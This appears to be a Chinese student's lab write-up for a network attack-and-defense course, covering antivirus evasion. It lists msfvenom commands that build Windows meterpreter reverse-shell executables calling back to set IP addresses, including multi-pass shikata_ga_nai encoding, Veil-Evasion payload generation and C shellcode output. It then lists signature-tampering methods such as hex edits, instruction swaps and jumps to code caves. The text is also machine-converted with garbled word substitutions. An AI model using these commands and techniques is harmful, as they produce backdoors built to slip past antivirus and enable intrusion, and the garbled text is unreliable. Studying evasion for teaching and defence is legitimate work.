20169207 2016-2017-2《網絡攻防實踐》第十四周做業

實踐內容：

(1)理解免殺技術原理
(2)正確使用msf編碼器，veil-evasion，本身利用shellcode編程等免殺工具或技巧；
（成功實現了免殺的。如何作成功的簡單語言描述便可，不要截圖、指令。與殺軟共生的結果驗證要截圖。）

msf編碼器

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.6.113 LPORT=5329 -f exe > 5329met-encoded.exe

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.15.128 LPORT=5329 -f exe > 5329met-encoded10.exe

veil-evasion

apt-get update
apt-get install veil-evasion
use python/meterpreter/rev_tcp
set LHOST 192.168.1.111
generate
5329
1

360的檢測仍是比較迅速的，在我剛開始運行程序時就獲得了報警預示。
接下來咱們用http://r.virscan.org/來進行檢測

shellcode編程

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.6.113 LPORT=443 -f c
exe文件檢測報告：

cpp文件檢測報告：

(3)經過組合應用各類技術實現惡意代碼免殺
(4)用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本
博客內容：

1.基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

• 1.基於特徵碼的檢測：分析指令的統計特性、代碼的結構特性等。若是一個可執行文件（或其餘運行的庫、腳本等）擁有通常惡意代碼所通有的特徵（開啓後門等）則被認爲是惡意代碼
• 2.啓發式惡意軟件檢測：構成惡意代碼的指令的含義，根據些片面特徵去推斷。

• 3.基於行爲的動態分析檢測：經過監視惡意代碼運行過程。如利用系統監視工具觀察惡意代碼運行過程時系統環境的變化，或經過跟蹤惡意代碼執行過程使用的系統函數和指令特徵分析惡意代碼功能，如出現惡意行爲，則屬於惡意代碼。

  （2）免殺是作什麼？

  免殺，字面意思上理解，就是「反-殺毒」，也就是經過必定的手段，使得殺毒工具沒法檢測出來軟件病毒或者木馬之類的「干擾性」特徵。

  （3）免殺的基本方法有哪些？

  免殺的方法包括：

• 1.方法一:直接修改特徵碼的十六進制法
  1.修改方法:把特徵碼所對應的十六進制改爲數字差1或差很少的十六進制.

2.適用範圍:必定要精肯定位特徵碼所對應的十六進制,修改後必定要測試一下能
否正常使用.

• 2.方法二:修改字符串大小寫法
  1.修改方法:把特徵碼所對應的內容是字符串的,只要把大小字互換一下就能夠了.
  2.適用範圍:特徵碼所對應的內容必需是字符串,不然不能成功.

• 3.方法三:等價替換法
  1.修改方法:把特徵碼所對應的彙編指令命令中替換成功能類擬的指令.
  2.適用範圍:特徵碼中必需有能夠替換的彙編指令.好比JN,JNE 換成JMP等.
  若是和我同樣對彙編不懂的能夠去查查8080彙編手冊.

• 4.方法四:指令順序調換法
  1.修改方法:把具備特徵碼的代碼順序互換一下.
  2.適用範圍:具備必定的侷限性,代碼互換後要不能影響程序的正常執行

• 5.方法五:通用跳轉法 1.修改方法:把特徵碼移到零區域(指代碼的空隙處),而後一個JMP又跳回來執行. 2.適用範圍:沒有什麼條件,是通用的改法,強烈建議你們要掌握這種改法.